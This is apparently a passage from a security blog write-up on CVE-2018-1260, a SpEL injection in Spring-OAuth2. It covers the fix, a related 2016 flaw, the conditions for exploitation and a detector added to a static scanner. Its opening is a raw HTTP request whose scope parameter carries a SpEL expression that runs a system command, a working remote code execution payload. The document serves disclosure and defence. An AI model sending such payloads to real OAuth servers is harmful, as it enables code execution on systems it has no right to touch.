HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 1 2 3 4 5 6 POST /oauth/authorize?response_type=code&client_id=client&username=user&password=user&grant_type=password&scope=%24%7bT(java.lang.Runtime).getRuntime().exec(%22calc.exe%22)%7d&redirect_uri=http://csrf.me HTTP/1.1 Host: localhost:8080 Authorization: Bearer 1f5e6d97-7448-4d8d-bb6f-4315706a4e38 Content-Type: application/x-www-form-urlencoded Accept: */* Content-Length: 0 Reviewing The Fix The solution chosen by the Pivotal team was to replace SpelView with a simpler view, with basic concatenation. This eliminates all possible paths to a SpEL evaluation. The first patch proposed introduced a potential XSS vulnerability, but luckily this was spotted before any release was made. The scope values are now properly escaped and free from any injection. More importantly, this solution improved the security of another endpoint: WhitelabelErrorEndpoint. The endpoint is also no longer uses a Spel View. It was found vulnerable to an identical attack vector in 2016. Spring-OAuth2 also used the SpelView class to build the error page. The interesting twist is that the template parameter was static, but the parameters bound to the template were evaluated recursively. This means that any value in the model could lead to a Remote Code Execution. Example with normal values Example with an expression included in the model This recursive evaluation was fixed by adding a random prefix to the expression boundary. The security of this template now relies on the randomness of 6 characters (62 possibilities to the power of 6). Some analysts were skeptical regarding this fix and raised the risk of a race condition if enough attempts are made. However, this is no longer a possibility since SpelView was also removed from this endpoint. The SpelView class is also present in Spring Boot. This implementation has a custom resolver to avoid recursion. This means that while the Spring-OAuth2 project no longer uses it, some other components, or proprietary applications, might have reused (copy-pasted) this utility class to save some time. For this reason, a new detector looking for SpelView was introduced in Find Security Bugs. The detector does not look for a specific package name because we assume that the application will likely have a copy of the SpelView class rather than a reference to Spring-OAuth2 or Spring Boot classes. Limitation & exploitability We encourage you to keep all your web applications’ dependencies up-to-date. If for any reason you must delay the last month’s updates, here are the specific conditions for exploitation: Spring OAuth2 in your dependency tree The users must have implicit flow enabled; it can be enabled along with other grant types The scope list needs to be empty (not explicitly set to one or more elements) The good news is that not all OAuth2 applications will be vulnerable. In order to specify arbitrary scopes, the user profile of the attacker needs to have an empty list of scopes. Conclusion This was the second and last article of the series on SpEL injection vulnerabilities. We hope it brought some light on this less frequent vulnerability class. As mentioned previously in Part 1, finding this vulnerability class in your own application is unlikely. It is more likely to come up in components similar to Spring-Data or Spring-OAuth. If you are a Java developer or tasked with reviewing Java code for security, you could scan your application using Find Security Bugs, the tool we used to find this vulnerability. This type of vulnerability hunting can be daunting because many code patterns cause indirection, making variable tracking harder. Kudos to Alvaros Muñoz, pyn3rd and Gal Goldshtein who reproduced the vulnerability and documented the flaw a few days after the official announcement made by Pivotal. Reference https://pivotal.io/security/cve-2018-1260: Official vulnerability announcement by Pivotal https://pivotal.io/security/cve-2016-4977: Similar vulnerability affecting Spring-OAuth2 https://docs.spring.io/spring/docs/3.0.x/reference/expressions.html: Spring Expression language capabilities http://find-sec-bugs.github.io/bugs.htm#SPEL_INJECTION: Bug description from Find Security Bugs Sursa: http://gosecure.net/2018/05/17/beware-of-the-magic-spell-part-2-cve-2018-1260/
×
×
  • Create New...